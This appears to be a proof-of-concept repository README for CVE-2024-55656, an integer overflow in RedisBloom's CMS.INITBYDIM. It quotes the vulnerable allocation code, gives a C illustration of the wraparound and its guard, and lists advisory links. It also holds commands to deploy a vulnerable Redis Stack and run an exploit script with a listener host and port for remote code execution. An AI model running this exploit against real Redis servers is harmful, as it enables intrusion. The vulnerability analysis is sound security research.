
CVE-2024-55656 PoC — RedisBloom Integer Overflow Remote Code Execution Vulnerability

Associated Vulnerability
Title: RedisBloom Integer Overflow Remote Code Execution Vulnerability (CVE-2024-55656)
Description: RedisBloom adds a set of probabilistic data structures to Redis. There is an integer overflow vulnerability in RedisBloom, which is a module used in Redis. The integer overflow allows an attacker (a Redis client that knows the password) to allocate less heap memory than required, due to wraparound. Reads and writes can then be performed beyond this allocated memory, leading to an info leak and an OOB write. The integer overflow is in the CMS.INITBYDIM command, which initializes a Count-Min Sketch to dimensions specified by the user. It accepts two values (width and depth) and uses them to allocate memory in NewCMSketch(). This vulnerability is fixed in 2.2.19, 2.4.12, 2.6.14, and 2.8.2.
Readme
### CVE-2024-55656 - Redis Stack - RedisBloom Integer Overflow Remote Code Execution Vulnerability

* Title: Redis Stack RedisBloom Integer Overflow Remote Code Execution Vulnerability
* ZDI: ZDI-25-009
* CVE: CVE-2024-55656
* Credits: rick2600 and gqsilva
* CVSS: 8.8 (HIGH)
* Affected version: RedisBloom v2.6.12 shipped with Redis Stack 7.2.0-v10

### Analysis (Short Version)
There is an integer overflow vulnerability in RedisBloom (https://github.com/RedisBloom/RedisBloom), which is a module used in Redis (https://redis.io/docs/latest/develop/data-types/probabilistic/bloom-filter/). The integer overflow allows an attacker (a Redis client that knows the password) to allocate less heap memory than required, due to wraparound. Reads and writes can then be performed beyond this allocated memory, leading to an info leak and an OOB write.

The integer overflow is in the CMS.INITBYDIM command, which initializes a Count-Min Sketch to dimensions specified by the user. It accepts two values (width and depth) and uses them to allocate memory in NewCMSketch(). The product `width * depth` is computed in `size_t` before it reaches `CMS_CALLOC`, so a pair of large dimensions wraps to a small cell count and the array is allocated far smaller than the sketch's dimensions imply.

File: src/cms.c

```c
CMSketch *NewCMSketch(size_t width, size_t depth) {
    assert(width > 0);
    assert(depth > 0);

    CMSketch *cms = CMS_CALLOC(1, sizeof(CMSketch));

    cms->width = width;
    cms->depth = depth;
    cms->counter = 0;
    cms->array = CMS_CALLOC(width * depth, sizeof(uint32_t));

    return cms;
}
```

The OOB read is reached through the CMS.QUERY command, implemented in CMS_Query().

The OOB write is reached through the CMS.INCRBY command, implemented in CMS_IncrBy().
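To make the wraparound concrete, and to show the guard that prevents it, here is an added example; it is not RedisBloom's code and not the project's actual patch. The `CMSketchDemo` type and the `cms_*` functions are stand-ins chosen for this illustration; the checked constructor rejects any width/depth pair whose cell count or byte size does not fit in `size_t`.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* Illustration-only stand-in for the module's sketch; the fields mirror the
 * README excerpt, but this is not RedisBloom's type or its actual fix. */
typedef struct {
    size_t width, depth;
    uint32_t *array;
} CMSketchDemo;

/* The unchecked product used by NewCMSketch(): it wraps silently in size_t. */
size_t cms_unchecked_cells(size_t width, size_t depth) {
    return width * depth;
}

/* Returns 1 if width * depth uint32_t cells fit in size_t without wraparound. */
int cms_dims_fit(size_t width, size_t depth) {
    if (width == 0 || depth == 0) return 0;
    if (depth > SIZE_MAX / width) return 0;               /* cell count wraps */
    return width * depth <= SIZE_MAX / sizeof(uint32_t);  /* byte count wraps */
}

/* Checked constructor: NULL when the dimensions are rejected or allocation
 * fails. calloc's own nmemb*size check cannot save the original code, because
 * the wraparound already happened in width * depth before calloc is called. */
CMSketchDemo *cms_new_checked(size_t width, size_t depth) {
    if (!cms_dims_fit(width, depth)) return NULL;
    CMSketchDemo *cms = calloc(1, sizeof *cms);
    if (!cms) return NULL;
    cms->width = width;
    cms->depth = depth;
    cms->array = calloc(width * depth, sizeof(uint32_t));
    if (!cms->array) { free(cms); return NULL; }
    return cms;
}

int main(void) {
    /* Constructed dimensions: (SIZE_MAX/2 + 2) * 2 == SIZE_MAX + 3, which wraps
     * to 2, so the unchecked code would back a huge sketch with 2 counters. */
    size_t huge = SIZE_MAX / 2 + 2;
    printf("unchecked cells: %zu\n", cms_unchecked_cells(huge, 2));
    printf("huge x 2: %s\n", cms_new_checked(huge, 2) ? "accepted" : "rejected");
    CMSketchDemo *ok = cms_new_checked(2000, 7);
    printf("2000 x 7: %s\n", ok ? "accepted" : "rejected");
    if (ok) { free(ok->array); free(ok); }
    return 0;
}
```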

For the full analysis, see the [advisory](https://github.com/RedisBloom/RedisBloom/security/advisories/GHSA-x5rx-rmq3-ff3h).

### Proof-of-Concept

1. Start redis-stack

   `docker run -p 6379:6379 --name redis-stack redis/redis-stack:7.2.0-v10`

2. Run the exploit

   `python exploit.py --host 172.17.0.2 --port 6379 --lhost 172.17.0.1 --lport 4444`

### References
1. https://www.zerodayinitiative.com/advisories/ZDI-25-009/
2. https://github.com/RedisBloom/RedisBloom/security/advisories/GHSA-x5rx-rmq3-ff3h
3. https://redis.io/blog/security-advisory-cve-2024-46981-cve-2024-51737-cve-2024-51480-cve-2024-55656/
File Snapshot

```
[4.0K] /data/pocs/e5e7f0a155ae0ed028ff3c5f04e9a2b578267492
├── [4.0K] exploit
│   ├── [ 10K] exploit.py
│   └── [ 12K] murmurhash2_1024.json
└── [2.1K] README.md

1 directory, 3 files
```